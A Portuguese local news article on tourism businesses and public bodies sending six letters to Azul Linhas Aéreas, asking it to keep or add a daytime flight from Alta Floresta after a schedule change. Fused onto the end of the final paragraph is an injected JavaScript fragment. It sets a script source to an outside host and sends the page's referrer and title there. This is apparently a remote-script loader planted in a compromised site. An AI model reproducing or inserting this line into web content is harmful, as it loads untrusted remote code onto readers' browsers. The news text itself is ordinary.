Capa / Em Destaque / Azul recebeu ofícios pedindo ampliação de frequências de voos desde Alta Floresta

Azul recebeu ofícios pedindo ampliação de frequências de voos desde Alta Floresta

azulKariny Santos

Empresas ligadas ao turismo, entidades e órgãos públicos elaboraram 6 (seis) ofícios e encaminharam à “Azul Linhas Aéreas” solicitando a permanência do voo diurno desde Alta Floresta, conforme costumeiramente vinha acontecendo há vários anos. Por decisão da própria empresa houve a mudança de horário, passando das 13h:45min para as 7h:45mim.

No entanto, o novo horário, que passa a vigorar a partir desta quinta-feira, 01, não agradou a maioria dos empresários ligados ao setor de turismo, que afirmam ter uma perda de receita na ordem de 30% inclusive com cancelamento de agendamentos que já haviam sido feitos.

Pelo novo horário a aeronave partirá às 22h de Cuiabá e chegará às 23h25 em Alta Floresta. No retorno, a aeronave sai de Alta Floresta às 07h45 e tem chegada prevista para às 9h no Aeroporto Internacional Marechal Rondon. Se de um lado, facilita a vida de quem necessita de ir para a capital do Estado para resolver assuntos rápidos, saindo de Alta Floresta de manhã e retornando à noite, pela ótica dos empresários do ramo de turismo essa realidade é outra, tendo em vista que as pousadas ficam distantes da sede do município e o horário de chegada, quase meia noite, obrigaria a um pernoite na cidade antes de seguir o destino.

Para buscar uma solução, os interessados se reuniram em duas oportunidades e elaboraram os ofícios destinados a empresa aérea, com o intuito não de trocar os voos, mas sim ampliar para duas frequências, já que o aeroporto municipal, conforme o gerente de seguranças operacionais Gilbert Vaes comporta voos de duas em duas horas, e pode atuar autorizado pela Infraero local, entre as 06h00min da manhã até a meia noite.

Seis ofícios foram enviados a empresa de viagens, cada um de um órgão específico e todos eles solicitam que haja a permanência do voo diurno, uma vez que a maior fonte de renda do município de Alta Floresta e região.

Foram encaminhados ofícios pela Secretaria de Estado de Desenvolvimento Econômico/SEDEC-MT; Consórcio intermunicipal de saúde da região do Alto Tapajós; Fórum regional de turismo do Cristalino; Grupo de Hotelaria da Amazônia Meridional composto por 9 empresas e mais 3 empreendimentos que inauguram em 2017; Câmara de Vereadores de Alta Floresta e um oficio encaminhado pela Câmara dos dirigentes Lojistas/ CDL em conjunto com o Sindicato Rural de Alta Floresta, Lojas Maçônicas Adonai/Darcy Ribeiro, Lions Club Alta Floresta, Rotary Club Alta Floresta, Igreja Batista Nacional, Igreja Presbiteriana Renovada.

Até o momento a Azul não se pronunciou, sobre a possibilidade da permanência dos voos em horário comum. A empresa de viagens Passaredo já confirmou que passa a atuar em Alta Floresta a partir do dia 06 de março e segundo o prefeito municipal Asiel Bezerra deve ocorrer os voos no período diurno, a nova ponte ligará Alta Floresta, Sinop e Brasília.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top